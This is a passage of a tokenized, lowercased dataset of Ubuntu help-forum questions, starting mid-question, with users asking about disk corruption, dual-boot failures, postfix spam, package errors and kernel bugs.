heads , 62 sectors/track , 1017 cylinders , total 7819264 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00011134 device boot start end blocks id system /dev/sda1 * 62 7818695 3909317 c w95 fat32 ( lba ) disk /dev/sdb : 80.0 gb , 80026360832 bytes 255 heads , 63 sectors/track , 9729 cylinders , total 156301486 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x7add7add device boot start end blocks id system /dev/sdb1 2048 2000895 999424 82 linux swap / solaris /dev/sdb2 * 2000896 58644479 28321792 83 linux /dev/sdb3 58646526 156301311 48827393 5 extended /dev/sdb5 58646528 156301311 48827392 7 hpfs/ntfs/exfat error : no partitions =================== default settings recommended-repair this setting would reinstall the of . additional repair would be performed : repair-filesystems =================== settings chosen by the user boot-info this setting will not act on the mbr . no change has been performed on your computer . while i attach this sdb ( as external ) to any running os following observations were made : in linux mint 's gparted : partitions /sdb1 ( ext4 ) & /sdb5 ( ntfs ) both have exclamation marks ! ( thus my ntfs too is corrupted somehow ) in win7 /sdb5 also ca n't be accessed rather windows offer me to format it to use it . chkdsk ca n't access this ntfs partition ! i have tested my hd for bad sectors but it 's healthy & why it should n't be its only ~3 months old . now i have tried whatever i can for the last 2 days but now you guys i look upon for assistance update 1 i have tried fsck.ext4 -v /dev/sdb2 but bad superblock error was returned . used mke2fs -n /dev/sdb2 to get a list of backup superblocks & finally upon each block number e2fsck -b < block_number > /dev/xxx was performed with no success : ( source for above method update 2 used testdisk utility & performed deep search for lost partitions & then tried to list files upon each found partition some of the ntfs partiton allowed me to enter them but there were no files only `` system volume information '' stuff ( some files i put in my /dev/sd5 should be there ! ) . it displayed that hd structure is present but i ca n't hook up in the linux partition nether testdisk was able to list files of that particular partition update 3 this is the 3rd day & still i ca n't get it to work so i am writing a prologue of how did my problem really started ... this 80gb drive though is my internal pc drive but frequently i also attach this as an external drive to my laptop . the drive was working fine for about 3 months . under linux mint ( in my laptop ) i attached it 3 days before ( & i often do that ) as an external usb drive . there i transferred ~16gb of data to its ntfs partition /dev/sdb5 . it went smoothly with ~25mb/sec rate & then i ( what i do always ) issued through context menu 'safely remove drive ' & it removed drive ( i think that was what supposed to happen ) nothing special ! but later when i tried to boot it nightmare started ... after a quick google search i must acknowledge that linux may also corrupt your grub & all even when drive is n't properly unmounted , thats really a shame to find because in windows i just pull out my usbs when transfer finishes but yes in *nix i do have found that even when transfer is completed & you pull out drive only to find nothing has been transferred ! bad luck if you used cut/paste
382590	ubuntu utility for mounting .dmg image of black armor nas 110 disk	i have a small business network which consisted of a blackarmor nas 110 , macbook pro , and toshiba laptop . the blackarmor nas 110 controller died . removed the 1tb hd and made images of the partitions . now i need to mount to copy all the data . what do i need to accomplish this ? ? thanks for all the input in advance ! ! ! !
382591	installation problem while console-setup-linux will be prepared	i want to install ubuntu on an old samsung netbook . i have ubuntu 13 on a usb stick . booting without installation is working and i can work but i want the full installation on my hdd . while the installation part console-setup-linux will be prepared ... an error appears : trying to overwrite '/etc/console-setup/compose.iso-8859-13.inc ' , which is also in package console-setup 1.88 i can just press ok and after this a windows appears which tell me that the installation is not complete and broke and it shutdown the system . maybe someone of you know this error , i want to thank you in advance for the help
382592	my postfix server became a spam server . how can i fix this ?	i gotten a vps recently and i wanted to host my own websites and with that , the ability to send and receive mail . i set up my mail server according to this guide : https : //www.exratione.com/2012/05/a-mailserver-on-ubuntu-1204-postfix-dovecot-mysql/ and it worked : i can access the smtp with starttsl and imap server with authentication , all on standard port . but now my postfix turned into a spam server ( currently it has 200+ mails queued up ) and i was forced to turn it down . also it always got all the mysql connections , and websites could n't connect to it . how can i fix my postfix ? my main.cf : http : //paste.ubuntu.com/6480219/ master.cf : http : //paste.ubuntu.com/6480228/
382594	ubuntu isnt in the boot list anymore ?	i have ubuntu 13.04 on my laptop beside windows 7. it was working fine . when , outra nowhere , i restarted the laptop , but no ubuntu in the boot list . directly goes to windows and boot up . any suggestion is more than welcome ? ? : (
382601	how to run pasuspender from upstart ?	i 'm trying to write an upstart script for running an application which needs direct access to alsa device ( pianoteq , a piano emulator ) . it works if runned from console , like so : pasuspender /opt/pianoteq\ 4\ stage/i386/pianoteq\ 4\ stage but if i try to run it from upstart exec pasuspender /opt/pianoteq\ 4\ stage/i386/pianoteq\ 4\ stage it works exactly like if i run it without pasuspender , lsof shows pulseaudio accesses /dev/snd/pcm* devices . what'are the reasons ? any ways to make it work ?
382602	does gzip hold any cache in memory or a temp file ?	i 'm doing some benchmarking on the compression of files with/without a hypervisor using gzip . the command i 'm running to test how long a file takes to complete is : time gzip -c filename.txt > filename.txt.gz i 'm a little confused , because the first time i run the command on a new file the time is always ~twice as long as any subsequent test until i reboot . for example : 1st run : .50 seconds 2nd run : .25 seconds 3rd run : .26 seconds ... why would there be such a difference in time ? does gzip store the compression in memory or somewhere else like a temp file ? thanks for any help !
382606	windows 8.1 is completely blocking ubuntu	a few days ago , i upgraded my windows 8 lenovo u410 ideapad to windows 8.1 , and it proved to be a terrible mistake . it seems like the only visible change that it has made is adding the start button . meanwhile , it disabled my audio , and i had to go and reinstall drivers from lenovo 's website . even worse , it is completely blocking me from running ubuntu in any way possible . i have my hard disk partitioned into three main partitions : 100gb for windows ( in ntfs ) ; 100gb for ubuntu ( in ext4 ... i think ) ; and a 550gb storage drive ( in ntfs ) . then on start up , the ubuntu grub screen ( this one ) would come up and i would be able to choose between booting into ubuntu and windows 8 . however , now after the update , i boot straight into windows 8.1 , and can not access the ubuntu file system . this would n't be that big of a problem , if it was n't for the fact that three almost-finished honors english papers are on there , and i need them . so first i tried booting into the ubuntu partition from the bios , which did n't work , and neither did trying to boot into it from the `` use a device '' menu in the windows `` advanced startup '' menu . next , i tried moving the ubuntu partition to the first spot in the boot sequence , and starting up my computer again . when that had no effect , i created an ubuntu usb drive , and went through all the same steps ( this is what the answers to questions similar to mine recommend ) . again , no result . i 've also noticed that even after changing the boot sequence in the bios , windows boot manager forces itself back to the front . i 'm at a loss for what to do , and i really need those english papers , so any help is much appreciated . thank you for reading this far , and thanks in advance for any advice .
382611	file says it does n't exist but it is right there	i am doing some crypto testing with openssl on ubuntu 12.04 and i have a directory build with the following specs : $ home/ democa/ certs index.txt serial openssl.cnf newcerts/ crl/ and everytime i run a command , specifically this : openssl ca -in server.csr -out server.crt -cert ca.crt -keyfile ca.key -config openssl.cnf it tells me : i am unable to access the ./democa/newcerts directory ./democa/newcerts : no such file or directory there are a few commands i run before this to set it up and i 'd be glad to outline them if that would be helpful but i have no idea why it wo n't find that one directory . any suggestions ? this is the lab i am running along with : http : //www.cis.syr.edu/~wedu/seed/labs/crypto/crypto_publickey/crypto_publickey.pdf
382613	text-only login after 13.10 upgrade	after upgrading from 13.04 to 13.10 i no longer get the gui login . after i login i can run startx and the gui login eventually comes up . how do i get the gui login back by default ?
382617	how do i install 13.10 beside 13.04 without using removable media ?	how do i install 13.10 beside 13.04 without using removable media ? i have two partitions . one has 13.04 and the other is empty . i 'd like to install 13.10 on the empty partition , but i do n't have any removable media to create an install disk . how do i run the network installer from my existing installation without overwriting it ?
382621	ca n't change the file attributes	i am a newby and do not understand the techi language used on various threads . i have a problem . my files and folders have both read and write permission to owner , but under the group with my own name it says none . i can not change this . it automatically becomes none again . please suggest a solution in a simple way . even if i need to use some commands , tell me where to put them ! thanks a bunch !
382636	can i get a messaging app for my ubuntu 13.10 laptop ? ( i have an iphone 5s )	i know there are ways to message on ubuntu if you have an android , i am wondering if it is possible to message when you have an iphone . the best would be an imessage client for ubuntu , but i do n't think those exist , so i am fine using another program ( it could use my email , but preferably my phone number ) .
382639	system rebooting during install	while installing ubuntu 13.10 through a usb drive a black screen shows with asking remaining processes to terminate then it reboots into windows . this screen shows after i choose how and where to install ubuntu . thanks
382645	change theme with old gnome look	i really like the old gnome theme ( photo ) , and i was wondering if there 's a posibility to install it on ubuntu 12.04 ? if so , tell me how please . thanks !
382646	server install from iso using apt-cacher server	i have a server running apt-cacher . is there any way to specify it as an apt source while doing a ubuntu server install from iso ? i 'm currently doing a minimum install and then modifying /etc/apt/sources.list . i 'm looking for something similar to the vmbuilder -- mirror option . currently using the 12.04.02 iso .
382651	ubuntu 12 or 13 vddk installation	i am trying to install the vmware vddk 5.5 on ubuntu . i have tried 12 and 13 . it installs just fine , but when i try to use the vmware-mount command it says `` command not found '' . please help . i really need to get this running asap . thank you . additional details : i downloaded the tar to my home directory . decompressed it and ran the .pl file inside the folder . i had to agree to the eula and i selected the default path `` /usr '' . apparently vddk needs fuse ( and also fuse-utils ) which was removed from the repos . i also read though that fuse-utils was removed because its integrated with the fuse package now , and for newer kernels its included with the os by default . so i dont think i 'm missing anything . why does the command fail . if i cant get this working i need another solution . all i need this for is to be able to open ( mount ) a .vmdk file and and modify a file within the file system , then unmount it and repackage the .vmdk as an ova for distribution . thanks for the help !
382658	how do i prevent ubuntu server from blanking the screen ?	i am running 12.04 ubuntu server and my screen blanks after some time . i am unabel to unblank it without power cycling the computer . i can however log in via ssh and type who see that the tty1 terminal is active . i have asked this question here twice before and have accepted the solutions that worked at that time . using console-tools editing /etc/kbd/config these no longer work . how do i prevent ubuntu server from blanking the screen ? or atleast unblank it without a power cycle ? i am not using x
382661	how to get requested librairies of gridwars ?	i would like to get a list of libraries requested by gridwars executable . i one year ago used ldd but moi @ mycomputer : /opt/gridwars/gridwars_lin $ ldd gridwars not a dynamic executable after browsing the internet , i found moi @ mycomputer : /opt/gridwars/gridwars_lin $ readelf -d gridwars dynamic section at offset 0x70014 contains 27 entries : tag type name/value 0x00000001 ( needed ) shared library : [ libx11.so.6 ] 0x00000001 ( needed ) shared library : [ libgl.so.1 ] 0x00000001 ( needed ) shared library : [ libglu.so.1 ] 0x00000001 ( needed ) shared library : [ libxxf86vm.so.1 ] 0x00000001 ( needed ) shared library : [ libstdc++.so.5 ] 0x00000001 ( needed ) shared library : [ libm.so.6 ] 0x00000001 ( needed ) shared library : [ libpthread.so.0 ] 0x00000001 ( needed ) shared library : [ libc.so.6 ] 0x0000000c ( init ) 0x804a284 0x0000000d ( fini ) 0x80b29bd 0x00000004 ( hash ) 0x8048168 0x00000005 ( strtab ) 0x8049268 0x00000006 ( symtab ) 0x8048678 0x0000000a ( strsz ) 2091 ( bytes ) 0x0000000b ( syment ) 16 ( bytes ) 0x00000015 ( debug ) 0x0 0x00000003 ( pltgot ) 0x80b811c 0x00000002 ( pltrelsz ) 1408 ( bytes ) 0x00000014 ( pltrel ) rel 0x00000017 ( jmprel ) 0x8049d04 0x00000011 ( rel ) 0x8049cd4 0x00000012 ( relsz ) 48 ( bytes ) 0x00000013 ( relent ) 8 ( bytes ) 0x6ffffffe ( verneed ) 0x8049c14 0x6fffffff ( verneednum ) 4 0x6ffffff0 ( versym ) 0x8049a94 0x00000000 ( null ) 0x0 right i have a list of the requested shared objects . but this still cause me some trouble : i can not understand two things ... as proposed in comment , we may want to run file utility on the executable . moi @ mycomputer : /opt/gridwars/gridwars_lin $ file gridwars gridwars : elf 32-bit lsb executable , intel 80386 , version 1 ( sysv ) , dynamically linked ( uses shared libs ) , for gnu/linux 2.2.0 , stripped how can i check if one `` .so '' file/shared object is available ? why the hell the gridwars executable is not an executable ? i remember the thing to be a executable and even having found a magic command in three letters that list requested shared objects and if there were available . thanks for any help .
382662	how to wake up tv tuner ( afatec 9033/9035 ) in kaffeine on ubuntu 13.10	i have a tv tuner , an afatec 9033/9035 . i 'm using kaffeine on ubuntu 13.10. dmesg shows that the installation is ok. kaffeine detects the tuner . however , it seems that the receiver does n't start . my processor is an amd fx ( tm ) -8350 x8 on a gigabyte 970 motherboard . how can i wake up the tv tuner ?
382663	problems related with texlive 2013 installation	i have installed texlive 2013 by burning it on a dvd . however after using tlmgr a few times to get the updates done i have been running into problems in every apt-get command i invoke . i have uninstalled everything related with texlive then did a clean installation again via dvd . however after i installed the editor texmaker the problem reoccurred . what may be the reason behind this and how can i fix it ? thanks in advance for your contribution . the message is as follows : reading state information ... done gnuplot is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 16 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up texlive-base ( 2009-15 ) ... mktexlsr : updating /var/lib/texmf/ls-r-texmfmain ... mktexlsr : updating /var/lib/texmf/ls-r-texlive ... mktexlsr : updating /var/lib/texmf/ls-r ... mktexlsr : done . texconfig : unknown option `paperconf ' given as argument for `texconfig dvips' texconfig : try `texconfig dvips ' for help texconfig : unknown option `paperconf ' given as argument for `texconfig dvipdfmx' texconfig : try `texconfig dvipdfmx ' for help texconfig : unknown option `paperconf ' given as argument for `texconfig xdvi' texconfig : try `texconfig xdvi ' for help texconfig : unknown option `paperconf ' given as argument for `texconfig pdftex' texconfig : try `texconfig pdftex ' for help texconfig : unknown option `paperconf ' given as argument for `texconfig dvips' texconfig : try `texconfig dvips ' for help dpkg : error processing texlive-base ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of texlive-latex-base : texlive-latex-base depends on texlive-base ( > = 2009-1 ) ; however : package texlive-base is not configured yet . dpkg : error processing texlive-latex-base ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of kile : kile depends on texlive-latex-base ; however : package texlive-latex-base is not configured yet . dpkg : error processing kile ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of texlive-latex-recommended : texlive-latex-recommended depends on texlive-latex-base ( > = 2009-1 ) ; however : package texlive-latex-base is not configured yet . dpkg : error processing texlive-latex-recommended ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of latex-xcolor : latex-xcolor depends on texlive-latex-recommended ; however : package texlive-latex-recommended isno apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already not configured yet . dpkg : error processing latex-xcolor ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of pgf : pgf depends on texlive-latex-recommended ; however : package texlive-latex-recommended is not configured yet . pgf depends on latex-xcolor ( > = 2.00-1 ) ; however : package latex-xcolor is not configured yet . dpkg : error processing pgf ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of latex-beamer : latex-beamer depends on pgf ( > = 1.00-1 ) ; however : package pgf is not configured yet . latex-beamer depends on latex-xcolor ( > = 2.00-1 ) ; however : package latex-xcolor is not configured yet . latex-beamer depends on texlive-latex-base ; however : package texlive-latex-base is not configured yet . dpkg : error processing latex-beamer ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of texlive-generic-recommended : no apport report written because maxreports is reached already no apport report written because maxreports is reached already texlive-generic-recommended depends on texlive-base ( > = 2009-1 ) ; however : package texlive-base is not configured yet . dpkg : error processing texlive-generic-recommended ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of texlive-pstricks : texlive-pstricks depends on texlive-generic-recommended ( > = 2009-1 ) ; however : package texlive-generic-recommended is not configured yet . texlive-pstricks depends on texlive-base ( > = 2009-1 ) ; however : package texlive-base is not configured yet . dpkg : error processing texlive-pstricks ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of prosper : prosper depends on texlive-latex-base ; however : package texlive-latex-base is not configured yet . prosper depends on texlive-pstricks ; however : package texlive-pstricks is not configured yet . prosper depends on texlive-latex-recommended ; however : package texlive-latex-recommended is not configured yet . dpkg : error processing prosper ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of texlive-fonts-recommended : texlive-fonts-recommended depends on texlive-base ( > = 2009-1 ) ; however : package texlive-base is not configured yet . dpkg : error processing texlive-fonts-recommended ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of texlive : texlive depends on texlive-fonts-recommended ( > = 2009-1 ) ; however : package texlive-fonts-recommended is not configured yet . texlive depends on texlive-latex-recommended ( > = 2009-1 ) ; however : package texlive-latex-recommended is not configured yet . texlive depends on texlive-latex-base ( > = 2009-1 ) ; however : package texlive-latex-base is not configured yet . dpkg : error processing texlive ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of texlive-extra-utils : texlive-extra-utils depends on texlive-base ( > = 2009-1 ) ; however : package texlive-base is not configured yet . dpkg : error processing texlive-extra-utils ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of texlive-font-utils : texlive-font-utils depends on texlive-base ( > = 2009-1 ) ; however : package texlive-base is not configured yet . dpkg : error processing texlive-font-utils ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of texlive-luatex : texlive-luatex depends on texlive-base ( > = 2009-1 ) ; however : package texlive-base is not configured yet . dpkg : error processing texlive-luatex ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of tipa : tipa depends on texlive-latex-base ; however : package texlive-latex-base is not configured yet . dpkg : error processing tipa ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : texlive-base texlive-latex-base kile texlive-latex-recommended latex-xcolor pgf latex-beamer texlive-generic-recommended texlive-pstricks prosper texlive-fonts-recommended texlive texlive-extra-utils texlive-font-utils texlive-luatex tipa
382664	use custom directory for apt-get ?	when we run apt-get update ubuntu read urls from /etc/apt/sources.list and package information save in /var/lib/apt/lists . can i customize this directories ? without harm /var/apt/lists and /etc/apt/sources.list . when i want to install a package using apt-get it will read package information from a specific directory ( /custom/apt/lists ) instead of /var/lib/apt/lists and update from /custom/apt/sources.list instead of /etc/apt/sources.list .
382665	creating a file by php in /var/www/	i have a little problem . i 'm studying php and my script : < ? php $ file = fopen ( `` file.txt '' , `` a+ '' ) ; fwrite ( $ file , `` trolololo '' ) ; fclose ( $ file ) ; ? > does n't work . on windows everything works fine , but i do n't like microsoft , so i 've migrated to ubuntu . script does n't work , because `` file.txt '' does n't want to create . i 've used in terminal 2 commands : sudo chmod -r 777 /var/www sudo chown tomek /var/www if you can , please , help me .
382674	i915 kernel bugs after compile kernel sources	i have sony vaio with old-school hybrid graphics . on xubuntu 13.10 with kernel 3.11.0-13-generic , i wanted to compile my own kernel from sources . i 've used /boot/config-xxx and sources from apt-get and after make , make modules_install and make install i have various kernel bugs like : nov 26 19:50:25 vaiuntu kernel : [ 4.545664 ] -- -- -- -- -- -- [ cut here ] -- -- -- -- -- -- nov 26 19:50:25 vaiuntu kernel : [ 4.545708 ] warning : cpu : 2 pid : 186 at drivers/gpu/drm/i915/intel_display.c:844 intel_wait_for_pipe_off+0x108/0x1e0 [ i915 ] ( ) nov 26 19:50:25 vaiuntu kernel : [ 4.545709 ] pipe_off wait timed out nov 26 19:50:25 vaiuntu kernel : [ 4.545716 ] modules linked in : nouveau ( + ) i915 ( + ) ttm mxm_wmi i2c_algo_bit drm_kms_helper drm wmi video nov 26 19:50:25 vaiuntu kernel : [ 4.545720 ] cpu : 2 pid : 186 comm : systemd-udevd not tainted 3.12.1-xubuntu-custom # 1 nov 26 19:50:25 vaiuntu kernel : [ 4.545721 ] hardware name : sony corporation vpcz12x9e/vaio , bios r3031c3 10/04/2011 nov 26 19:50:25 vaiuntu kernel : [ 4.545725 ] 0000000000000009 ffff88003402f2a8 ffffffff817361a9 ffff88003402f2f0 nov 26 19:50:25 vaiuntu kernel : [ 4.545728 ] ffff88003402f2e0 ffffffff810867cd 0000000000070008 ffff8801c6414000 nov 26 19:50:25 vaiuntu kernel : [ 4.545730 ] 00000000fffedf56 ffff88003402ffd8 ffff8801d2a55418 ffff88003402f340 nov 26 19:50:25 vaiuntu kernel : [ 4.545731 ] call trace : nov 26 19:50:25 vaiuntu kernel : [ 4.545739 ] [ < ffffffff817361a9 > ] dump_stack+0x45/0x56 nov 26 19:50:25 vaiuntu kernel : [ 4.545745 ] [ < ffffffff810867cd > ] warn_slowpath_common+0x7d/0xa0 nov 26 19:50:25 vaiuntu kernel : [ 4.545748 ] [ < ffffffff8108683c > ] warn_slowpath_fmt+0x4c/0x50 nov 26 19:50:25 vaiuntu kernel : [ 4.545779 ] [ < ffffffffa011d2f8 > ] intel_wait_for_pipe_off+0x108/0x1e0 [ i915 ] nov 26 19:50:25 vaiuntu kernel : [ 4.545806 ] [ < ffffffffa011d462 > ] intel_disable_pipe+0x92/0xa0 [ i915 ] nov 26 19:50:25 vaiuntu kernel : [ 4.545820 ] [ < ffffffffa0120126 > ] ironlake_crtc_disable+0xd6/0x950 [ i915 ] nov 26 19:50:25 vaiuntu kernel : [ 4.545835 ] [ < ffffffffa0124e54 > ] __intel_set_mode+0x804/0x1420 [ i915 ] nov 26 19:50:25 vaiuntu kernel : [ 4.545850 ] [ < ffffffffa0127ef6 > ] intel_set_mode+0x16/0x30 [ i915 ] nov 26 19:50:25 vaiuntu kernel : [ 4.545864 ] [ < ffffffffa01287f3 > ] intel_crtc_set_config+0x7e3/0x9d0 [ i915 ] nov 26 19:50:25 vaiuntu kernel : [ 4.545877 ] [ < ffffffffa002656d > ] drm_mode_set_config_internal+0x5d/0xe0 [ drm ] nov 26 19:50:25 vaiuntu kernel : [ 4.545881 ] [ < ffffffffa00e2681 > ] drm_fb_helper_set_par+0x71/0xf0 [ drm_kms_helper ] nov 26 19:50:25 vaiuntu kernel : [ 4.545883 ] [ < ffffffff8140a874 > ] fbcon_init+0x504/0x580 nov 26 19:50:25 vaiuntu kernel : [ 4.545886 ] [ < ffffffff81483a1c > ] visual_init+0xbc/0x120 nov 26 19:50:25 vaiuntu kernel : [ 4.545888 ] [ < ffffffff81486213 > ] do_bind_con_driver+0x163/0x330 nov 26 19:50:25 vaiuntu kernel : [ 4.545889 ] [ < ffffffff814869c4 > ] do_take_over_console+0x114/0x1c0 nov 26 19:50:25 vaiuntu kernel : [ 4.545891 ] [ < ffffffff81406313 > ] do_fbcon_takeover+0x63/0xd0 nov 26 19:50:25 vaiuntu kernel : [ 4.545892 ] [ < ffffffff8140b4ad > ] fbcon_event_notify+0x6dd/0x830 nov 26 19:50:25 vaiuntu kernel : [ 4.545895 ] [ < ffffffff817427cc > ] notifier_call_chain+0x4c/0x70 nov 26 19:50:25 vaiuntu kernel : [ 4.545898 ] [ < ffffffff810afb0d > ] __blocking_notifier_call_chain+0x4d/0x70 nov 26 19:50:25 vaiuntu kernel : [ 4.545900 ] [ < ffffffff810afb46 > ] blocking_notifier_call_chain+0x16/0x20 nov 26 19:50:25 vaiuntu kernel : [ 4.545903 ] [ < ffffffff813fb84b > ] fb_notifier_call_chain+0x1b/0x20 nov 26 19:50:25 vaiuntu kernel : [ 4.545904 ] [ < ffffffff813fd82d > ] register_framebuffer+0x1dd/0x310 nov 26 19:50:25 vaiuntu kernel : [ 4.545906 ] [ < ffffffffa00e231f > ] drm_fb_helper_initial_config+0x32f/0x510 [ drm_kms_helper ] nov 26 19:50:25 vaiuntu kernel : [ 4.545924 ] [ < ffffffffa01575bb > ] ? i915_read32+0x6b/0x140 [ i915 ] nov 26 19:50:25 vaiuntu kernel : [ 4.545940 ] [ < ffffffffa014b741 > ] intel_fbdev_initial_config+0x21/0x30 [ i915 ] nov 26 19:50:25 vaiuntu kernel : [ 4.545952 ] [ < ffffffffa00f2307 > ] i915_driver_load+0xf27/0xf50 [ i915 ] nov 26 19:50:25 vaiuntu kernel : [ 4.545959 ] [ < ffffffffa0022119 > ] drm_get_pci_dev+0x129/0x2f0 [ drm ] nov 26 19:50:25 vaiuntu kernel : [ 4.545971 ] [ < ffffffffa00ee65c > ] i915_pci_probe+0x2c/0x70 [ i915 ] nov 26 19:50:25 vaiuntu kernel : [ 4.545974 ] [ < ffffffff813d28de > ] local_pci_probe+0x3e/0x70 nov 26 19:50:25 vaiuntu kernel : [ 4.545976 ] [ < ffffffff813d3cc1 > ] pci_device_probe+0x121/0x130 nov 26 19:50:25 vaiuntu kernel : [ 4.545978 ] [ < ffffffff814b5695 > ] driver_probe_device+0x125/0x3b0 nov 26 19:50:25 vaiuntu kernel : [ 4.545979 ] [ < ffffffff814b59f3 > ] __driver_attach+0x93/0xa0 nov 26 19:50:25 vaiuntu kernel : [ 4.545981 ] [ < ffffffff814b5960 > ] ? __device_attach+0x40/0x40 nov 26 19:50:25 vaiuntu kernel : [ 4.545982 ] [ < ffffffff814b3493 > ] bus_for_each_dev+0x63/0xa0 nov 26 19:50:25 vaiuntu kernel : [ 4.545983 ] [ < ffffffff814b504e > ] driver_attach+0x1e/0x20 nov 26 19:50:25 vaiuntu kernel : [ 4.545984 ] [ < ffffffff814b4bc0 > ] bus_add_driver+0x200/0x2d0 nov 26 19:50:25 vaiuntu kernel : [ 4.545985 ] [ < ffffffffa0092000 > ] ? 0xffffffffa0091fff nov 26 19:50:25 vaiuntu kernel : [ 4.545987 ] [ < ffffffff814b6074 > ] driver_register+0x64/0xf0 nov 26 19:50:25 vaiuntu kernel : [ 4.545988 ] [ < ffffffffa0092000 > ] ? 0xffffffffa0091fff nov 26 19:50:25 vaiuntu kernel : [ 4.545989 ] [ < ffffffff813d275c > ] __pci_register_driver+0x4c/0x50 nov 26 19:50:25 vaiuntu kernel : [ 4.545995 ] [ < ffffffffa00223fa > ] drm_pci_init+0x11a/0x130 [ drm ] nov 26 19:50:25 vaiuntu kernel : [ 4.545996 ] [ < ffffffffa0092000 > ] ? 0xffffffffa0091fff nov 26 19:50:25 vaiuntu kernel : [ 4.546007 ] [ < ffffffffa0092066 > ] i915_init+0x66/0x68 [ i915 ] nov 26 19:50:25 vaiuntu kernel : [ 4.546009 ] [ < ffffffff810020fa > ] do_one_initcall+0xfa/0x1b0 nov 26 19:50:25 vaiuntu kernel : [ 4.546011 ] [ < ffffffff810559c3 > ] ? set_memory_nx+0x43/0x50 nov 26 19:50:25 vaiuntu kernel : [ 4.546014 ] [ < ffffffff810f8e23 > ] load_module+0x1cb3/0x2760 nov 26 19:50:25 vaiuntu kernel : [ 4.546015 ] [ < ffffffff810f4e90 > ] ? store_uevent+0x40/0x40 nov 26 19:50:25 vaiuntu kernel : [ 4.546017 ] [ < ffffffff810f9972 > ] sys_init_module+0xa2/0xf0 nov 26 19:50:25 vaiuntu kernel : [ 4.546020 ] [ < ffffffff81746e2d > ] system_call_fastpath+0x1a/0x1f nov 26 19:50:25 vaiuntu kernel : [ 4.546021 ] -- - [ end trace ba08b783bf661eed ] -- - problem persist on newest 3.12.1 . looks similar to : https : //bugs.freedesktop.org/show_bug.cgi ? id=54687 now my question is how you guys managed to compile this kernel ( on same config ) so i have no bugs booting `` stock ubuntu '' kernel , when almost the same kernel compiled by myself ( on same .config ) makes my laptop stuck and panic ? give me at least hint where to look for a help now ?
382675	wifi network manager minimal distro	i have installed a minimal ubuntu distro on my eepc and the install xfce4 , seems everything fine , but i ca n't find a wifi connection manager . i want a traditional one , with scan then connect and then ask for a password . it looks like there is not on the distro . how can i do that ?
382676	how do i disable the administrators account ?	my school gave me this ubuntu laptop and it still has its schools administrators account on it . how can i get rid of it ?
382683	windows 8.1 installing ubuntu dual boot error	this is my very first experience with ubuntu and linux as a whole , and i have tried to read dual booting instructions but alas they are of no help due to this error : i would like to be able to dual boot if that is an option .
382685	connecting ubuntu 12.04 lts to windows network	i am very new to linux . i have an existing windows network consisting of 3 windows 7 computers . none of the computer user accounts have a password . how do i connect to the network ( including printer ) from ubuntu 12.04 ?
382686	graphics artifacts booting in an hp pavilion , how to fix it ?	i installed ubuntu 12.04 on my old hp pavilion ze1210 laptop . when i boot to ubuntu it shows less than half of the screen ; the rest is garbled and has a mixture of red and black squares . the top portion that is somewhat visible when the computer boots becomes distorted when i move the cursor ( a red square ) over it .
382687	ca n't manage to make usb bootable	i have switched several times between different ubuntu and windows versions in the past several years , and decided to go for ubuntu again . after downloading a 64-bit 13.10 ubuntu desktop , i tried putting it on my 8 gb flash drive ( which i 've used countless times for this ) but whenever i try to boot from it i get a bio flasher utility instead of ubuntu . i tried both fat32 and ntfs as well as using both unetbootin and universal usb installer , all with same results . if it matters , my motherboard is biostar g41d3 and my cpu is intel c2d e7500 .
382691	online accounts and amazon ec2 issues	land . i have discovered that i am unable to log on to the amazon ec2 console website with my online accounts running . i had two gmail-based online accounts setup , and i love the way they integrate to the gnome3 desktop . it 's great . i really prefer gnome3 over unity , but that 's another story . in any event , running ubuntu 13 , gnome3 desktop , and with 2 gmail-based online accounts ; i am unable to log onto amazon console for ec2 management . additionally , the online account manager spawned some jabber accounts on its own ? anyway , when i deleted all of my `` online accounts , '' i was then able to authenticate to ec2 ; and i was constantly rejected by the same login with them enabled . any suggestions on how to get these things to play nicely together ?
382693	bluetooth devices degrades my wireless	i am using 13.10 on a dell n411z i was using 13.04 with no problem . when i stream u-tube , movies etc using a bluetooth speaker or headphones . my wireless degrades to a stop and buffers for along time then will stream for a second or two then stops again . if i disconnect the bluetooth device it recovers instantly . i have searched and searched for fix but no luck .
382694	why does wubi give an `` installation size '' of 18 gb ?	when i run wubi , that is , the windows installer for ubuntu 12.04 lts , i 'm given a pull-down menu in the download dialog-box . it offers , pre-set , an installation size of 18 gb , although one can pull down the menu and choose , it seems , anywhere from 5 gb to 30 gb . which size should i choose ? and why is n't this feature mentioned in the download instructions that are linked to from the download page ? i must admit , i am miffed by this apparent omission .
